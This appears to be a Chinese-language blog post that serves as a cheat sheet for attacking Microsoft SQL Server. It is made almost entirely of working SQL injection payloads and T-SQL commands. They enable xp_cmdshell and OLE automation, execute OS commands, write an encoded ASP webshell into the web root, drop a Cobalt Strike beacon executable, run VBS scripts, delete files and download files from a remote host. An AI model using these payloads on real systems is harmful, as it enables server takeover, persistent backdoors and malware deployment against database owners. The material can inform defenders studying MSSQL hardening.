Loading

MSSQL攻击面探索

xp_cmdshell

开启

id=1 ' EXEC sp_configure 'show advanced options', 1; RECONFIGURE; exec SP_CONFIGURE 'xp_cmdshell', 1; RECONFIGURE; --+

命令执行

id=1 ' exec master.dbo.xp_cmdshell 'whoami > c:/2.txt' --+

盲写结果到网站目录

盲写结果到网站目录,c:\hellomy.txt为网站特征文件,直接用这条语句到注入场景会有问题

exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\hellomy.txt'') do (whoami > %i\..\whoami.txt)'

回显结果直接插入表中

id=1' CREATE TABLE tmpTable (tmp1 varchar(8000));insert into tmpTable(tmp1) exec master..xp_cmdshell 'ipconfig';
id=1' union select 1,tmp1,null from (SELECT ROW_NUMBER () OVER (ORDER BY tmp1) AS row_number,* from tmpTable) as a where row_number=3 --

回显结果先落地再导入表中

自行修改适配SQL注入场景,前文有示例

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c ipconfig >c:\\users\\public\\111.txt'

--drop table testTable
CREATE TABLE testTable (data varchar(2000));
 
--把文件中的数据导入到临时表中
BULK INSERT testTable 
  FROM 'c:\users\public\111.txt'
  WITH 
   (
     ROWTERMINATOR ='\n'
   )
--查询结果 
select * from testTable;

无堆叠情况下开启xp_cmdshell并命令执行

if 1=1 execute('exec sp_configure ''show advanced options'',1;reconfigure;exec sp_configure ''xp_cmdshell'', 1;reconfigure;exec xp_cmdshell ''whoami''');

sp_oacreate

所有语句只在MSSQL客户端中使用过,可能SQL注入场景下需要自行调试

开启

exec sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE;   
exec sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE;

命令执行

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c whoami /all >C:\\test\test.txt'

回显,SQL注入场景下有问题

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c "for /f %i in (''dir /s /b c:\hellomy.txt'') do (whoami > %i\..\whoami.txt)"'

写Webshell

--写webshell
exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\hellomy.txt'') do (echo PCUKUmVzcG9uc2UuQ2hhclNldCA9ICJVVEYtOCIgCms9ImU0NWUzMjlmZWI1ZDkyNWIiClNlc3Npb24oImsiKT1rCnNpemU9UmVxdWVzdC5Ub3RhbEJ5dGVzCmNvbnRlbnQ9UmVxdWVzdC5CaW5hcnlSZWFkKHNpemUpCkZvciBpPTEgVG8gc2l6ZQpyZXN1bHQ9cmVzdWx0JkNocihhc2NiKG1pZGIoY29udGVudCxpLDEpKSBYb3IgQXNjKE1pZChrLChpIGFuZCAxNSkrMSwxKSkpCk5leHQKZXhlY3V0ZShyZXN1bHQpCiU+ > %i\..\bx.txt)'
--解码
exec master.dbo.xp_cmdshell 'for /f %i in (''dir /s /b c:\bx.txt'') do (certutil.exe -decode %i\..\bx.txt %i\..\1.asp)'

COM组件

命令执行

declare @ffffffff0x int,@exec int,@text int,@str varchar(8000)
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@ffffffff0x output
exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;

写Webshell

把Webshell进行HEX编码进行写入,保证不出现什么乱七八糟的字符

DECLARE @ObjectToken INT;
EXEC Sp_OACreate '{00000566-0000-0010-8000-00AA006D2EA4}',@ObjectToken OUTPUT;
EXEC Sp_OASetProperty @ObjectToken, 'Type', 1;
EXEC sp_oamethod @ObjectToken, 'Open';
EXEC sp_oamethod @ObjectToken, 'Write', NULL,0x3c250a526573706f6e73652e43686172536574203d20225554462d3822200a6b3d2265343565333239666562356439323562220a53657373696f6e28226b22293d6b0a73697a653d526571756573742e546f74616c42797465730a636f6e74656e743d526571756573742e42696e617279526561642873697a65290a466f7220693d3120546f2073697a650a726573756c743d726573756c74264368722861736362286d69646228636f6e74656e742c692c31292920586f7220417363284d6964286b2c286920616e64203135292b312c312929290a4e6578740a6578656375746528726573756c74290a253e;
EXEC sp_oamethod @ObjectToken, 'SaveToFile', NULL,'ffffffff0x.txt',2;
EXEC sp_oamethod @ObjectToken, 'Close';
EXEC sp_OADestroy @ObjectToken;

写EXE

把exe转hex

xxd -ps beacon.exe hex.txt

写入

MSSQL2005似乎出现了点问题,2008正常

DECLARE @DATA VARBINARY(MAX) = 0x...
        DECLARE @filepath VARCHAR(MAX) = 'C:\\Windows\\temp\\cs.exe'
        DECLARE @ObjectToken INT
        EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
        EXEC sp_OASetProperty @ObjectToken, 'Type', 1
        EXEC sp_OAMethod @ObjectToken, 'Open'
        EXEC sp_OAMethod @ObjectToken, 'Write', NULL, @DATA
        EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, @filepath, 2
        EXEC sp_OAMethod @ObjectToken, 'Close'
        EXEC sp_OADestroy @ObjectToken
        SELECT @filepath

写VBS并执行

-- 写VBS
declare @o int, @f int, @t int, @ret int,@a int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'createtextfile', @f out, 'c:\\www\\ffffffff0x.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 'hahahahahahhahahah'

-- 执行
DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out
EXEC sp_oamethod @s,[run],NULL,[c:\\www\\ffffffff0x.vbs]

复制文件

declare @ffffffff0x int;
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out;
exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\calc_copy.exe';

移动文件

declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject',@ffffffff0x out
exec sp_oamethod @ffffffff0x,'movefile',null,'c:\\www\\1.txt','c:\\www\\3.txt'

删除文件

declare @result int
declare @ffffffff0x int
exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out
exec sp_oamethod @ffffffff0x,'deletefile',null,'c:\\www\\1.txt'
exec sp_oadestroy @ffffffff0x

远程下载文件

DECLARE @object INT, @object2 INT, @response varbinary(8000);exec Sp_OACreate 'Microsoft.XMLHTTP', @object OUTPUT;EXEC sp_OAMethod @object, 'Open', NULL, 'GET', 'http://192.168.2.107:9000/1.txt',0;EXEC sp_OAMethod @object, 'Send', NULL;EXEC sp_OAGetProperty @object, 'responseBody', @response OUTPUT;EXEC Sp_OACreate 'ADODB.Stream', @object2 OUTPUT ;EXEC sp_OASetProperty @object2, 'Type', 1;EXEC sp_OASetProperty @object2, 'Mode', 3;EXEC sp_OAMethod @object2, 'Open', NULL EXEC sp_OAMethod @object2, 'Write', NULL, @response;EXEC sp_OAMethod @object2, 'SaveToFile', NULL, 'C:\inetpub\wwwroot\1.txt', 1;
posted @ 2023-01-08 20:01  mi2ac1e  阅读(240)  评论(0编辑  收藏  举报